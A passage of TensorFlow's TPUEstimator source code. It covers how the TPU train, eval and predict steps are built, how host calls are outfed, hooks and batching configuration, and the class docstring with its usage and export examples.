    all TPU shards. Besides, the input should be taken from the TPU infeed
    rather than from the input pipeline (input_fn) directly. To fit the TPU
    loop-and-replicate pattern, the original train computation should be
    reformed into the returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
    Returns:
      A tuple of train_fn, host_calls, captured scaffold_fn, and captured
      training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(ops.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients,
training.get_global_step())
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
    For TPU evaluation, an eval (computation) step is first wrapped in a
    tf.while_loop control flow to repeat many times and then replicated to
    all TPU shards. Besides, the input and output are slightly different. The
    input, features and labels, should be taken from the TPU infeed rather
    than the input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
    To fit the TPU evaluation pattern, the original eval computation should be
    reformed into the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
    Returns:
      A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
      hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
    Returns:
      A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
      prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
    # TODO(xiejw): Adds validation for prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
    # Makes a deep copy of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = ops.get_default_graph()._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
ops.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
ops.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
          err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with ops.device(tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [control_flow_ops.cond(
math_ops.equal(math_ops.mod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: control_flow_ops.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
      A dictionary mapping each host_call name to the return value of the
      corresponding host_fn.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
    # constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
    # It is assumed evaluation always happens on a single-host TPU system, so
    # place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
          # TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
            # If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
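# NOTE (added illustration): a minimal sketch, not part of the original module,
# of the `host_call` structure `_OutfeedHostCall` above works with: a mapping
# from a name to a `(host_fn, tensors)` pair. `create_cpu_hostcall` simply runs
# the host_fn, which is the path taken when `use_tpu=False`. The tensor values
# and the summary op are illustrative assumptions.
def _example_cpu_hostcall():
  """Illustrative sketch only; never called by this module."""
  import tensorflow.compat.v1 as tf  # assumed import, used only by the sketch
  loss = tf.constant([0.5])
  def host_fn(loss_t):
    return tf.summary.scalar('loss', loss_t[0])
  return _OutfeedHostCall.create_cpu_hostcall({'host_call': (host_fn, [loss])})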
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
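# NOTE (added illustration): a minimal sketch, not part of the original module,
# of attaching `ExamplesPerSecondHook` above to a training call. `my_estimator`,
# `my_input_fn`, the batch size and the step counts are illustrative
# assumptions.
def _example_examples_per_second_hook(my_estimator, my_input_fn):
  """Illustrative sketch only; never called by this module."""
  hook = ExamplesPerSecondHook(batch_size=1024, every_n_steps=100,
                               output_dir=my_estimator.model_dir)
  my_estimator.train(input_fn=my_input_fn, max_steps=10000, hooks=[hook])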
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
      A BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
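# NOTE (added illustration): a minimal sketch, not part of the original module,
# of constructing the `BatchConfig` defined above for inference batching. The
# concrete sizes and timeout are illustrative assumptions; note that
# `allowed_batch_sizes` must increase monotonically and end at
# `max_batch_size`, as documented in `__new__` above.
def _example_batch_config():
  """Illustrative sketch only; never called by this module."""
  return BatchConfig(
      num_batch_threads=2,
      max_batch_size=128,
      batch_timeout_micros=5000,
      allowed_batch_sizes=[32, 64, 128],
      max_enqueued_batches=10)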
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
  # Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
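As a rough sketch (assuming `export_dir` points at the exported model and
`tpu_grpc_url` at a TPU worker; both names are placeholders), serving the TPU
metagraph manually could look like:
```
sess = tf.compat.v1.Session(tpu_grpc_url)
sess.run(tf.compat.v1.tpu.initialize_system())
tf.compat.v1.saved_model.loader.load(
    sess, [saved_model.SERVING, saved_model.TPU], export_dir)
# ... feed the serving signature's inputs and fetch its outputs ...
sess.run(tf.compat.v1.tpu.shutdown_system())
```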
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = (
    export_output_lib.ClassificationOutput(classes=classes))
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets the `params['use_tpu']` flag to let the
user know whether the code is exporting to TPU. When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively, use `inference_on_tpu()`, which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (e.g., batching).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
